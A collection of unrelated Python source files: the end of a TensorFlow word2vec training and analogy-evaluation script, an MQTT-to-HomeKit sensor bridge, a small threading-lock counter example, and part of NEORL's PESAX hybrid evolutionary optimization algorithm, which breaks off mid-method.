Returns:
questions: a [n, 4] numpy array containing the analogy question's
word ids.
questions_skipped: questions skipped due to unknown words.
"""
questions = []
questions_skipped = 0
with open(self._options.eval_data) as analogy_f:
for line in analogy_f:
if line.startswith(":"): # Skip comments.
continue
words = line.strip().lower().split(" ")
ids = [self._word2id.get(w.strip()) for w in words]
if None in ids or len(ids) != 4:
questions_skipped += 1
else:
questions.append(np.array(ids))
print "Eval analogy file: ", self._options.eval_data
print "Questions: ", len(questions)
print "Skipped: ", questions_skipped
self._analogy_questions = np.array(questions, dtype=np.int32)
def build_graph(self):
"""Build the model graph."""
opts = self._options
# The training data. A text file.
(words, counts, words_per_epoch, current_epoch, total_words_processed,
examples, labels) = word2vec.skipgram(filename=opts.train_data,
batch_size=opts.batch_size,
window_size=opts.window_size,
min_count=opts.min_count,
subsample=opts.subsample)
(opts.vocab_words, opts.vocab_counts,
opts.words_per_epoch) = self._session.run([words, counts, words_per_epoch])
opts.vocab_size = len(opts.vocab_words)
print "Data file: ", opts.train_data
print "Vocab size: ", opts.vocab_size - 1, " + UNK"
print "Words per epoch: ", opts.words_per_epoch
self._id2word = opts.vocab_words
for i, w in enumerate(self._id2word):
self._word2id[w] = i
# Declare all variables we need.
# Input words embedding: [vocab_size, emb_dim]
w_in = tf.Variable(
tf.random_uniform(
[opts.vocab_size,
opts.emb_dim], -0.5 / opts.emb_dim, 0.5 / opts.emb_dim),
name="w_in")
# Global step: scalar, i.e., shape [].
w_out = tf.Variable(tf.zeros([opts.vocab_size, opts.emb_dim]), name="w_out")
# Global step: []
global_step = tf.Variable(0, name="global_step")
# Linear learning rate decay.
words_to_train = float(opts.words_per_epoch * opts.epochs_to_train)
lr = opts.learning_rate * tf.maximum(
0.0001,
1.0 - tf.cast(total_words_processed, tf.float32) / words_to_train)
# Training nodes.
inc = global_step.assign_add(1)
with tf.control_dependencies([inc]):
train = word2vec.neg_train(w_in,
w_out,
examples,
labels,
lr,
vocab_count=opts.vocab_counts.tolist(),
num_negative_samples=opts.num_samples)
self._w_in = w_in
self._examples = examples
self._labels = labels
self._lr = lr
self._train = train
self.step = global_step
self._epoch = current_epoch
self._words = total_words_processed
def save_vocab(self):
"""Save the vocabulary to a file so the model can be reloaded."""
opts = self._options
with open(os.path.join(opts.save_path, "vocab.txt"), "w") as f:
for i in xrange(opts.vocab_size):
f.write(opts.vocab_words[i] + " " + str(opts.vocab_counts[i]) + "\n")
def build_eval_graph(self):
"""Build the evaluation graph."""
# Eval graph
opts = self._options
# Each analogy task is to predict the 4th word (d) given three
# words: a, b, c. E.g., a=italy, b=rome, c=france, we should
# predict d=paris.
# The eval feeds three vectors of word ids for a, b, c, each of
# which is of size N, where N is the number of analogies we want to
# evaluate in one batch.
analogy_a = tf.placeholder(dtype=tf.int32) # [N]
analogy_b = tf.placeholder(dtype=tf.int32) # [N]
analogy_c = tf.placeholder(dtype=tf.int32) # [N]
# Normalized word embeddings of shape [vocab_size, emb_dim].
nemb = tf.nn.l2_normalize(self._w_in, 1)
# Each row of a_emb, b_emb, c_emb is a word's embedding vector.
# They all have the shape [N, emb_dim]
a_emb = tf.gather(nemb, analogy_a) # a's embs
b_emb = tf.gather(nemb, analogy_b) # b's embs
c_emb = tf.gather(nemb, analogy_c) # c's embs
# We expect that d's embedding vectors on the unit hyper-sphere is
# near: c_emb + (b_emb - a_emb), which has the shape [N, emb_dim].
target = c_emb + (b_emb - a_emb)
# Compute cosine distance between each pair of target and vocab.
# dist has shape [N, vocab_size].
dist = tf.matmul(target, nemb, transpose_b=True)
# For each question (row in dist), find the top 4 words.
_, pred_idx = tf.nn.top_k(dist, 4)
# Nodes for computing neighbors for a given word according to
# their cosine distance.
nearby_word = tf.placeholder(dtype=tf.int32) # word id
nearby_emb = tf.gather(nemb, nearby_word)
nearby_dist = tf.matmul(nearby_emb, nemb, transpose_b=True)
nearby_val, nearby_idx = tf.nn.top_k(nearby_dist,
min(1000, opts.vocab_size))
# Nodes in the construct graph which are used by training and
# evaluation to run/feed/fetch.
self._analogy_a = analogy_a
self._analogy_b = analogy_b
self._analogy_c = analogy_c
self._analogy_pred_idx = pred_idx
self._nearby_word = nearby_word
self._nearby_val = nearby_val
self._nearby_idx = nearby_idx
# Properly initialize all variables.
tf.initialize_all_variables().run()
self.saver = tf.train.Saver()
def _train_thread_body(self):
initial_epoch, = self._session.run([self._epoch])
while True:
_, epoch = self._session.run([self._train, self._epoch])
if epoch != initial_epoch:
break
def train(self):
"""Train the model."""
opts = self._options
initial_epoch, initial_words = self._session.run([self._epoch, self._words])
workers = []
for _ in xrange(opts.concurrent_steps):
t = threading.Thread(target=self._train_thread_body)
t.start()
workers.append(t)
last_words, last_time = initial_words, time.time()
while True:
time.sleep(5) # Reports our progress once a while.
(epoch, step, words,
lr) = self._session.run([self._epoch, self.step, self._words, self._lr])
now = time.time()
last_words, last_time, rate = words, now, (words - last_words) / (
now - last_time)
print "Epoch %4d Step %8d: lr = %5.3f words/sec = %8.0f\r" % (epoch, step,
lr, rate),
sys.stdout.flush()
if epoch != initial_epoch:
break
for t in workers:
t.join()
def _predict(self, analogy):
"""Predict the top 4 answers for analogy questions."""
idx, = self._session.run([self._analogy_pred_idx], {
self._analogy_a: analogy[:, 0],
self._analogy_b: analogy[:, 1],
self._analogy_c: analogy[:, 2]
})
return idx
def eval(self):
"""Evaluate analogy questions and reports accuracy."""
# How many questions we get right at precision@1.
correct = 0
total = self._analogy_questions.shape[0]
start = 0
while start < total:
limit = start + 2500
sub = self._analogy_questions[start:limit, :]
idx = self._predict(sub)
start = limit
for question in xrange(sub.shape[0]):
for j in xrange(4):
if idx[question, j] == sub[question, 3]:
# Bingo! We predicted correctly. E.g., [italy, rome, france, paris].
correct += 1
break
elif idx[question, j] in sub[question, :3]:
# We need to skip words already in the question.
continue
else:
# The correct label is not the precision@1
break
print
print "Eval %4d/%d accuracy = %4.1f%%" % (correct, total,
correct * 100.0 / total)
def analogy(self, w0, w1, w2):
"""Predict word w3 as in w0:w1 vs w2:w3."""
wid = np.array([[self._word2id.get(w, 0) for w in [w0, w1, w2]]])
idx = self._predict(wid)
for c in [self._id2word[i] for i in idx[0, :]]:
if c not in [w0, w1, w2]:
return c
return "unknown"
def nearby(self, words, num=20):
"""Prints out nearby words given a list of words."""
ids = np.array([self._word2id.get(x, 0) for x in words])
vals, idx = self._session.run(
[self._nearby_val, self._nearby_idx], {self._nearby_word: ids})
for i in xrange(len(words)):
print "\n%s\n=====================================" % (words[i])
for (neighbor, distance) in zip(idx[i, :num], vals[i, :num]):
print "%-20s %6.4f" % (self._id2word[neighbor], distance)
def _start_shell(local_ns=None):
# An interactive shell is useful for debugging/development.
import IPython
user_ns = {}
if local_ns:
user_ns.update(local_ns)
user_ns.update(globals())
IPython.start_ipython(argv=[], user_ns=user_ns)
def main(_):
"""Train a word2vec model."""
if not FLAGS.train_data or not FLAGS.eval_data or not FLAGS.save_path:
print "--train_data --eval_data and --save_path must be specified."
sys.exit(1)
opts = Options()
with tf.Graph().as_default(), tf.Session() as session:
model = Word2Vec(opts, session)
for _ in xrange(opts.epochs_to_train):
model.train() # Process one epoch
model.eval() # Eval analogies.
# Perform a final save.
model.saver.save(session, os.path.join(opts.save_path, "model.ckpt"),
global_step=model.step)
if FLAGS.interactive:
# E.g.,
# [0]: model.Analogy('france', 'paris', 'russia')
# [1]: model.Nearby(['proton', 'elephant', 'maxwell'])
_start_shell(locals())
if __name__ == "__main__":
tf.app.run()
|
engine.py | import sys
from pyhap.accessory_driver import AccessoryDriver
import json
import logging
import random
import signal
import time
import toml
from forms import convert
from paho.mqtt import client as mqtt_client
from pyhap.accessory import Accessory, Bridge
from pyhap.const import CATEGORY_SENSOR
from domoticz import fresh_list, acc_data
from multiprocessing import Process
data = toml.load("data.toml")
logging.basicConfig(level=logging.DEBUG, format="[%(module)s] %(message)s")
log = logging.getLogger(__name__)
broker = data['mqtt']['broker']
port = data['mqtt']['port']
topic = data['mqtt']['topic']
client_id = f'python-mqtt-{random.randint(0, 100)}'
username = data['mqtt']['username']
password = data['mqtt']['password']
db = {}
# aid_db = {}
idxes_list = []
# idxes_rem = []
def subscribe(client: mqtt_client):
def on_message(client, userdata, msg):
str_msg = msg.payload.decode()
dict_msg = json.loads(str_msg)
dev_id, _form, _type = convert(dict_msg)
if dev_id:
_form = {_type: _form}
access = {dev_id: _form}
log.debug(f"Added device: {access}")
db.update(access)
else:
log.debug(f"Device not added: "
f"id - [{dev_id}], type - [{_type}], form - [{_form}]")
log.debug(f"All current devices: {db}")
client.subscribe(topic)
client.on_message = on_message
def connect_mqtt() -> mqtt_client:
def on_connect(client, userdata, flags, rc):
if rc == 0:
log.info("Connected to MQTT Broker!")
else:
log.error("Failed to connect, return code %d\n", rc)
client = mqtt_client.Client(client_id)
client.username_pw_set(username, password)
client.on_connect = on_connect
client.connect(broker, port)
return client
class TemperatureSensor(Accessory):
"""Temperature sensor."""
category = CATEGORY_SENSOR
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.temp = 0.0
self.id = ''
serv_temp = self.add_preload_service('TemperatureSensor')
self.char_temp = serv_temp.configure_char('CurrentTemperature')
def set_id(self, _id):
self.id = _id
def current_temp(self, value):
self.temp = float(value)
@Accessory.run_at_interval(3)
async def run(self):
try:
acc_values = db[self.id]['Temp']
self.current_temp(acc_values['value'])
except Exception:
pass
self.char_temp.set_value(self.temp)
class HumiditySensor(Accessory):
"""Humidity sensor."""
category = CATEGORY_SENSOR
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.hum_level = 0.0
self.id = ''
serv_humidity = self.add_preload_service('HumiditySensor')
self.char_level = serv_humidity.configure_char('CurrentRelativeHumidity')
def set_id(self, _id):
self.id = _id
def current_humidity(self, value):
self.hum_level = float(value)
@Accessory.run_at_interval(3)
async def run(self):
try:
acc_values = db[self.id]['Humidity']
self.current_humidity(acc_values['value'])
except Exception:
pass
self.char_level.set_value(self.hum_level)
def get_bridge(driver, bridge):
"""Call this method to get a Bridge instead of a standalone accessory."""
_url = data['domoticz']['url']
ids_list = []
acc_current = {}
for idx in idxes_list:
acc_id, _form, _type = acc_data(_url, idx, log)
_form = {_type: _form}
full_acc = {acc_id: _form}
ids_list.append(acc_id)
acc_current.update(full_acc)
# bridge = Bridge(driver, 'Bridge')
log.debug("* " * 40)
log.debug(acc_current)
log.debug("* " * 40)
for key in ids_list:
log.debug(f"Add accessory id: {key}")
for _type, _value in acc_current[key].items():
log.debug('> ' * 35)
log.debug(f'Acc to add (idx {_value["idx"]}): {key}, {_type}, {_value}')
log.debug('> ' * 35)
if _type == 'Temp':
temp_sensor = get_temp_sensor(driver, key, acc_current)
bridge.add_accessory(temp_sensor)
elif _type == 'Humidity':
humidity_sensor = get_humidity_sensor(driver, key, acc_current)
bridge.add_accessory(humidity_sensor)
# for aid, acc_value in bridge.accessories.items():
# print(f'{aid} | {acc_value} | {acc_value.display_name}')
# for _type in acc_current.values():
#
# for sens in _type.values():
#
# if acc_value.display_name == sens['name']:
# acc = {str(sens['idx']): {"aid": aid, "name": acc_value.display_name}}
# aid_db.update(acc)
return bridge
def get_temp_sensor(driver, acc_id, acc_current):
name = acc_current[acc_id]['Temp']['name']
model = acc_current[acc_id]['Temp']['model']
serial_number = acc_current[acc_id]['Temp']['idx']
access = TemperatureSensor(driver, name)
access.set_info_service(model=model, serial_number=serial_number)
access.current_temp(acc_current[acc_id]['Temp']['value'])
access.set_id(_id=acc_id)
return access
def get_humidity_sensor(driver, acc_id, acc_current):
name = acc_current[acc_id]['Humidity']['name']
model = acc_current[acc_id]['Humidity']['model']
serial_number = acc_current[acc_id]['Humidity']['idx']
access = HumiditySensor(driver, name)
access.set_info_service(model=model, serial_number=serial_number)
access.current_humidity(acc_current[acc_id]['Humidity']['value'])
access.set_id(_id=acc_id)
return access
def get_accessory(driver):
"""Call this method to get a standalone Accessory."""
return TemperatureSensor(driver, 'MyTempSensor')
def start_proc():
client = connect_mqtt()
subscribe(client)
client.loop_forever()
client.loop_stop()
def start_hk():
mqtt_proc = Process(target=start_proc, args=(), daemon=True)
mqtt_proc.start()
# Start the accessory on port 51826
driver = AccessoryDriver(port=51826, persist_file='accessory.state')
bridge = Bridge(driver, 'Bridge')
# Change `get_accessory` to `get_bridge` if you want to run a Bridge.
driver.add_accessory(accessory=get_bridge(driver, bridge))
driver.accessory
# We want SIGTERM (terminate) to be handled by the driver itself,
# so that it can gracefully stop the accessory, server and advertising.
# signal.signal(signal.SIGINT, driver.signal_handler)
signal.signal(signal.SIGTERM, driver.signal_handler)
driver.start()
log.debug(
f"accessory_id values !!!: > > {bridge.accessories.values()}")
# accessories = bridge.accessories
aids = []
for aid, accessory in bridge.accessories.items():
aids.append(aid)
print(f'{aid} | {accessory}')
for aid in aids:
bridge.accessories[aid].services.clear()
bridge.accessories.pop(aid)
bridge.driver.config_changed()
driver.accessory = None
driver.config_changed()
# aid => accessory.display_name
# idx => name => aid
# db = {"1": {"aid": 1, "name": "name_123"}}
# bridge.accessories.clear()
# global idxes_rem
# for idx, value in aid_db.items():
# aid = int(value['aid'])
#
# for _idx in idxes_rem:
#
# if _idx == idx:
# bridge.accessories.pop(aid)
# log.debug(f"accessory_id items : > > {bridge.accessories.items()}")
# idxes_rem.clear()
mqtt_proc.terminate()
def start():
global idxes_list
hk_proc = Process(target=start_hk, args=())
_url = data['domoticz']['url']
while True:
idxes_temp = fresh_list(_url, log) # idx list()
restart = False
for idx in idxes_temp:
if idx not in idxes_list:
restart = True
for idx in idxes_list:
if idx not in idxes_temp:
restart = True
# idxes_rem.append(idx)
if restart:
idxes_list = idxes_temp
# driver.accessory = None
# driver.config_changed()
# driver.stop()
if hk_proc.is_alive():
try:
hk_proc.terminate()
time.sleep(1)
log.debug("Process is terminating success")
except Exception:
hk_proc.kill()
log.debug("Process is killing success")
hk_proc = Process(target=start_hk, args=())
hk_proc.start()
time.sleep(40)
if __name__ == '__main__':
start()
sys.exit(0)
|
solution_3_no_fuzzy.py | import threading
rabbits_colony_size: int = 0
counter_lock = threading.Lock()
printer_lock = threading.Lock()
def rabbit_counter(number_of_rabbits: int):
global rabbits_colony_size
with counter_lock:
rabbits_colony_size += number_of_rabbits
with printer_lock:
print(f'Now we have {rabbits_colony_size} rabbits')
print('---------------')
workers = []
for _ in range(10):
worker = threading.Thread(target=rabbit_counter, args=[1])
workers.append(worker)
worker.start()
for worker in workers:
worker.join()
print('All rabbits are counted')
|
pesax.py | # This file is part of NEORL.
# Copyright (c) 2021 Exelon Corporation and MIT Nuclear Science and Engineering
# NEORL is free software: you can redistribute it and/or modify
# it under the terms of the MIT LICENSE
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# -*- coding: utf-8 -*-
#"""
#Created on Sun Jun 28 18:21:05 2020
#
#@author: Majdi Radaideh
#"""
from neorl.hybrid.pesacore.er import ExperienceReplay
from neorl.hybrid.pesacore.de import DEmod
from neorl.hybrid.pesacore.es import ESMod
from neorl.hybrid.pesacore.pso import PSOMod
from copy import deepcopy
from multiprocessing import Process, Queue
import random
import numpy as np
from collections import defaultdict
import time
from neorl.utils.seeding import set_neorl_seed
class PESAX(ExperienceReplay):
"""
PESAX: A hybrid algorithm of PSO, ES, and DE. This is the implementation used in Appendix B of: Radaideh et al. (2021). Prioritized Experience Replay for Parallel Hybrid Evolutionary and Swarm Algorithms: Application to Nuclear Fuel, Under Review.
*PESAX Major Parameters*
:param mode: (str) problem type, either "min" for minimization problem or "max" for maximization
:param bounds: (dict) input parameter type and lower/upper bounds in dictionary form. Example: ``bounds={'x1': ['int', 1, 4], 'x2': ['float', 0.1, 0.8], 'x3': ['float', 2.2, 6.2]}``
:param fit: (function) the fitness function
:param npop: (int) total number of individuals in each group. So for ES, PSO, and SA, full population is ``npop*3``.
:param mu: (int) number of individuals to survive to the next generation.
Also, ``mu`` equals to the number of individuals to sample from the memory. If None, ``mu=int(npop/2)``.
So 1/2 of PESA population comes from previous generation, and 1/2 comes from the replay memory (See **Notes** below for more info)
:param memory_size: (int) max size of the replay memory (if None, ``memory_size`` is built to accommodate all samples during search)
:param alpha_init: (float) initial value of the prioritized replay coefficient (See **Notes** below)
:param alpha_end: (float) final value of the prioritized replay coefficient (See **Notes** below)
:param alpha_backdoor: (float) backdoor greedy replay rate/probability to sample from the memory for SA instead of random-walk (See **Notes** below)
*PESAX Auxiliary Parameters (for the internal algorithms)*
:param cxpb: (float) for **ES**, population crossover probability between [0,1]
:param mutpb: (float) for **ES**, population mutation probability between [0,1]
:param c1: (float) for **PSO**, cognitive speed constant
:param c2: (float) for **PSO**, social speed constant
:param speed_mech: (str) for **PSO**, type of speed mechanism for to update particle velocity, choose between ``constric``, ``timew``, ``globw``.
:param CR: (float) for **DE**, crossover probability between [0,1]
:param F: (float) for **DE**, differential/mutation weight between [0,2]
*PESAX Misc. Parameters*
:param ncores: (int) number of parallel processors
:param seed: (int) random seed for sampling
"""
def __init__ (self, mode, bounds, fit, npop, mu=None, #general parameters
memory_size=None, alpha_init=0.1, alpha_end=1, #replay parameters
CR=0.7, F=0.5, #DE parameters
cxpb=0.7, mutpb=0.2, #ES parameters
c1=2.05, c2=2.05, speed_mech='constric', #PSO parameters
ncores=1, seed=None): #misc parameters
#--------------------
#General Parameters
#--------------------
set_neorl_seed(seed)
self.BOUNDS=bounds
#--mir
self.mode=mode
if mode == 'max':
self.FIT=fit
elif mode == 'min':
def fitness_wrapper(*args, **kwargs):
return -fit(*args, **kwargs)
self.FIT=fitness_wrapper
else:
raise ValueError('--error: The mode entered by user is invalid, use either `min` or `max`')
self.NPOP=npop
self.pso_flag=True
if ncores <= 3:
self.NCORES=1
self.PROC=False
else:
self.PROC=True
if self.pso_flag:
self.NCORES=int(ncores/3)
else:
self.NCORES=int(ncores/2)
# option for first-level parallelism
#self.PROC=True
self.SEED=seed
#--------------------
#Experience Replay
#--------------------
self.MODE='prior'; self.ALPHA0=alpha_init; self.ALPHA1=alpha_end
#--------------------
# DE hyperparameters
#--------------------
self.F=F
self.CR=CR
#--------------------
# ES HyperParameters
#--------------------
if mu:
assert mu < npop, '--error: The value of mu ({}) MUST be less than npop ({})'.format(mu, npop)
self.MU=mu
else:
self.MU=int(npop/2)
self.CXPB=cxpb; self.MUTPB=mutpb; self.INDPB=1.0
#--------------------
# PSO HyperParameters
#--------------------
self.C1=c1; self.C2=c2; self.SPEED_MECH=speed_mech
#-------------------------------
#Memory Supply for each method
#-------------------------------
self.ES_MEMORY=self.MU
self.DE_MEMORY=self.NPOP-self.MU
self.PSO_MEMORY=self.NPOP-self.MU
#--------------------
# Fixed/Derived parameters
#--------------------
self.nx=len(self.BOUNDS) #all
self.memory_size=memory_size
self.LAMBDA=self.NPOP #ES
self.NPAR=self.NPOP #PSO
self.SMIN = 1/self.nx #ES
self.SMAX = 0.5 #ES
self.v0=0.1 #constant to initialize PSO speed, not very important
def evolute(self, ngen, x0=None, warmup=100, verbose=0):
"""
This function evolutes the PESAX algorithm for number of generations.
:param ngen: (int) number of generations to evolute
:param x0: (list of lists) initial samples to start the replay memory (``len(x0)`` must be equal or more than ``npop``)
:param warmup: (int) number of random warmup samples to initialize the replay memory and must be equal or more than ``npop`` (only used if ``x0=None``)
:param verbose: (int) print statistics to screen, 0: no print, 1: PESA print, 2: detailed print
:return: (tuple) (best individual, best fitness, and a list of fitness history)
"""
self.verbose=verbose
self.NGEN=ngen
self.STEPS=self.NGEN*self.NPOP #all
if self.memory_size:
self.MEMORY_SIZE=self.memory_size
else:
self.MEMORY_SIZE=self.STEPS*3+1 #PESA
#-------------------------------------------------------
# Check if initial pop is provided as initial guess
#-------------------------------------------------------
if x0:
# use provided initial guess
warm=ESMod(bounds=self.BOUNDS, fit=self.FIT, mu=self.MU, lambda_=self.LAMBDA, ncores=self.NCORES)
x0size=len(x0)
assert x0size >= self.NPOP, 'the number of lists in x0 ({}) must be more than or equal npop ({})'.format(x0size, self.NPOP)
self.pop0=warm.init_pop(warmup=x0size, x_known=x0) #initial population for ES
else:
#create initial guess
assert warmup > self.NPOP, 'the number of warmup samples ({}) must be more than npop ({})'.format(warmup, self.NPOP)
warm=ESMod(bounds=self.BOUNDS, fit=self.FIT, mu=self.MU, lambda_=self.LAMBDA, ncores=self.NCORES)
self.pop0=warm.init_pop(warmup=warmup) #initial population for ES
self.partime={}
self.partime['pesa']=[]
self.partime['es']=[]
self.partime['pso']=[]
self.partime['de']=[]
self.fit_hist=[]
#------------------------------
# Step 1: Initialize the memory
#------------------------------
self.mymemory=ExperienceReplay(size=self.MEMORY_SIZE) #memory object
xvec0, obj0=[self.pop0[item][0] for item in self.pop0], [self.pop0[item][2] for item in self.pop0] #parse the initial samples
self.mymemory.add(xvec=xvec0, obj=obj0, method=['na']*len(xvec0)) # add initial samples to the replay memory
#--------------------------------
# Step 2: Initialize all methods
#--------------------------------
# Obtain initial population for all methods
espop0, swarm0, swm_pos0, swm_fit0, local_pos, local_fit, x0_de, fit0_de=self.init_guess(pop0=self.pop0)
# Initialize ES class
es=ESMod(bounds=self.BOUNDS, fit=self.FIT, mu=self.MU, lambda_=self.LAMBDA, ncores=self.NCORES, indpb=self.INDPB,
cxpb=self.CXPB, mutpb=self.MUTPB, smin=self.SMIN, smax=self.SMAX)
# Initialize DE class
de=DEmod(bounds=self.BOUNDS, fit=self.FIT, npop=self.NPOP, F=self.F,
CR=self.CR, ncores=self.NCORES, seed=self.SEED)
# Initialize PSO class (if USED)
if self.pso_flag:
pso=PSOMod(bounds=self.BOUNDS, fit=self.FIT, npar=self.NPAR, swm0=[swm_pos0,swm_fit0],
ncores=self.NCORES, c1=self.C1, c2=self.C2, speed_mech=self.SPEED_MECH)
#--------------------------------
# Step 3: Initialize PESA engine
#--------------------------------
#Use initial samples as first guess for DE, ES, and PSO
self.pop_next=deepcopy(espop0) # x0 for ES
self.de_next=deepcopy(x0_de) # x0 for DE
if self.pso_flag:
self.swm_next, self.local_pos_next, self.local_fit_next=deepcopy(swarm0), deepcopy(local_pos), deepcopy(local_fit) # x0 for PSO (if used)
self.STEP0=1 #step counter
self.ALPHA=self.ALPHA0 #set alpha to alpha0
#--------------------------------
# Step 4: PESA evolution
#--------------------------------
for gen in range(1,self.NGEN+1):
caseids=['es_gen{}_ind{}'.format(gen,ind+1) for ind in range(self.LAMBDA)] # save caseids for ES
if self.pso_flag:
pso_caseids=['pso_gen{}_par{}'.format(gen+1,ind+1) for ind in range(self.NPAR)] # save caseids for PSO
#-------------------------------------------------------------------------------------------------------------------
# Step 5: evolute all methods for 1 generation
#-------------------------------------------------------------------------------------------------------------------
#**********************************
#--Step 5A: Complete PARALEL calcs
# via multiprocess.Process
#*********************************
if self.PROC:
t0=time.time()
QDE = Queue(); QES=Queue(); QPSO=Queue()
def de_worker():
random.seed(self.SEED)
xde_best, yde_best, de_new=de.evolute(ngen=1,x0=self.de_next, verbose=0)
QDE.put((xde_best, yde_best, de_new))
def es_worker():
random.seed(self.SEED)
pop_new, es_partime=es.evolute(population=self.pop_next,ngen=1,caseids=caseids)
QES.put((pop_new, es_partime))
def pso_worker():
random.seed(self.SEED)
if gen > 1:
swm_new, swm_pos_new, swm_fit_new, pso_partime=pso.evolute(ngen=1, swarm=self.swm_next, local_pos=self.local_pos_next, local_fit=self.local_fit_next,
swm_best=[self.swm_pos, self.swm_fit], mu=self.MU, exstep=self.STEP0, exsteps=self.STEPS,
caseids=pso_caseids, verbose=0)
else:
swm_new, swm_pos_new, swm_fit_new, pso_partime=pso.evolute(ngen=1, swarm=self.swm_next, local_pos=self.local_pos_next,
local_fit=self.local_fit_next, mu=self.MU, exstep=self.STEP0, exsteps=self.STEPS,
caseids=pso_caseids, verbose=0)
QPSO.put((swm_new, swm_pos_new, swm_fit_new, pso_partime))
Process(target=de_worker).start()
Process(target=es_worker).start()
if self.pso_flag:
Process(target=pso_worker).start()
self.swm_next, self.swm_pos, self.swm_fit, pso_partime=QPSO.get()
self.local_pos_next=[self.swm_next[key][3] for key in self.swm_next]
self.local_fit_next=[self.swm_next[key][4] for key in self.swm_next]
self.de_best, self.yde_best, self.de_next=QDE.get()
self.pop_next, es_partime=QES.get()
#self.partime.append(time.time()-t0)
self.partime['pesa'].append(time.time()-t0)
self.partime['pso'].append(pso_partime)
self.partime['es'].append(es_partime)
#print(self.partime)
#*********************************
#--Step 5B: Complete Serial calcs
#*********************************
else:
self.pop_next, _ =es.evolute(population=self.pop_next,ngen=1,caseids=caseids) #ES serial
self.de_best, self.yde_best, self.de_next=de.evolute(ngen=1,x0=self.de_next, verbose=0)
if self.pso_flag:
self.swm_next, self.swm_pos, self.swm_fit, _ =pso.evolute(ngen=1, swarm=self.swm_next, local_pos=self.local_pos_next,
local_fit=self.local_fit_next, exstep=self.STEP0, exsteps=self.STEPS,
caseids=pso_caseids, mu=self.MU, verbose=0)
self.local_pos_next=[self.swm_next[key][3] for key in self.swm_next]
self.local_fit_next=[self.swm_next[key][4] for key in self.swm_next]
#*********************************************************
# Step 5C: Obtain relevant statistics for this generation
#*********************************************************
self.STEP0=self.STEP0+self.NPOP #update step counter
self.de_next=self.select(pop=self.de_next, k=self.MU) #Keep top DE population
self.inds, self.rwd=[self.pop_next[i][0] for i in self.pop_next], [self.pop_next[i][2] for i in self.pop_next] #ES statistics
self.mean_strategy=[np.mean(self.pop_next[i][1]) for i in self.pop_next] #ES statistics
if self.pso_flag:
self.pars, self.fits=[self.swm_next[i][0] for i in self.swm_next], [self.swm_next[i][2] for i in self.swm_next] #PSO statistics
self.mean_speed=[np.mean(self.swm_next[i][1]) for i in self.swm_next]
if self.verbose==2:
self.printout(mode=1, gen=gen)
#-------------------------------------------------------------------------------------------------------------------
#-------------------------------------------------------------------------------------------------------------------
#-----------------------------
# Step 6: Update the memory
#-----------------------------
self.memory_update()
#-----------------------------------------------------------------
# Step 7: Sample from the memory and prepare for next Generation
#-----------------------------------------------------------------
self.resample()
#--------------------------------------------------------
# Step 8: Anneal Alpha if priortized replay is used
#--------------------------------------------------------
if self.MODE=='prior': #anneal alpha between alpha0 (lower) and alpha1 (upper)
self.ALPHA=self.linear_anneal(step=self.STEP0, total_steps=self.STEPS, a0=self.ALPHA0, a1=self.ALPHA1)
#--------------------------------------------------------
# Step 9: Calculate the memory best and print PESA summary
#--------------------------------------------------------
self.pesa_best=self.mymemory.sample(batch_size=1,mode='greedy')[0] #`greedy` will sample the best in memory
self.fit_hist.append(self.pesa_best[1])
self.memory_size=len(self.mymemory.storage) #memory size so far
if self.verbose: #print summary data to screen
self.printout(mode=2, gen=gen)
#--mir
if self.mode=='min':
self.fitness_best=-self.pesa_best[1]
else:
self.fitness_best=self.pesa_best[1]
#--mir
if self.mode=='min':
self.fit_hist=[-item for item in self.fit_hist]
return self.pesa_best[0], self.fitness_best, self.fit_hist
def select(self, pop, k=1):
#"""
#Select function sorts the population from max to min based on fitness and select k best
#Inputs:
# pop (dict): population in dictionary structure
# k (int): top k individuals are selected
#Returns:
# best_dict (dict): the new ordered dictionary with top k selected
#"""
pop=list(pop.items())
pop.sort(key=lambda e: e[1][1], reverse=True)
sorted_dict=dict(pop[:k])
#This block creates a new dict where keys are reset to 0 ... k in order to avoid unordered keys after sort
best_dict=defaultdict(list)
index=0
for key in sorted_dict:
best_dict[index].append(sorted_dict[key][0])
best_dict[index].append(sorted_dict[key][1])
index+=1
sorted_dict.clear()
return best_dict
def linear_anneal(self, step, total_steps, a0, a1):
#"""
#Anneal parameter between a0 and a1
#:param step: current time step
#:param total_steps: total numbe of time steps
#:param a0: lower bound of alpha/parameter
#:param a0: upper bound of alpha/parameter
#:return
# - annealed value of alpha/parameter
#"""
fraction = min(float(step) / total_steps, 1.0)
return a0 + fraction * (a1 - a0)
def memory_update(self):
#"""
#This function updates the replay memory with the samples of SA, ES, and PSO (if used)
#then remove the duplicates from the memory
#"""
de_x, de_y=[self.de_next[item][0] for item in self.de_next], [self.de_next[item][1] for item in self.de_next]
self.mymemory.add(xvec=tuple(de_x), obj=de_y, method=['na']*len(de_x))
self.mymemory.add(xvec=tuple(self.inds), obj=self.rwd, method=['na']*len(self.inds))
if self.pso_flag:
self.mymemory.add(xvec=tuple(self.pars), obj=self.fits, method=['na']*len(self.pars))
#self.mymemory.remove_duplicates() #remove all duplicated samples in memory to avoid biased sampling
def resample(self):
#"""
#This function samples data from the memory and prepares the chains for SA
#the population for ES, and the swarm for PSO for the next generation
# -SA: initial guess for the parallel chains are sampled from the memroy
# -ES: a total of ES_MEMORY (or MU) individuals are sampled from the memory and appended to ES population
# -PSO: a total of PSO_MEMORY (or MU) particles are sampled from the memory and appended to PSO swarm
#For SA: x_next and E_next particpate in next generation
#For PSO: swm_next, local_pso_next, and local_fit_next particpate in next generation
#For ES: pop_next particpates in next generation
#"""
es_replay=self.mymemory.sample(batch_size=self.ES_MEMORY,mode=self.MODE,alpha=self.ALPHA)
index=self.MU
for sample in range(self.ES_MEMORY):
self.pop_next[index].append(es_replay[sample][0])
self.pop_next[index].append([random.uniform(self.SMIN,self.SMAX) for _ in range(self.nx)])
self.pop_next[index].append(es_replay[sample][1])
index+=1
if self.pso_flag:
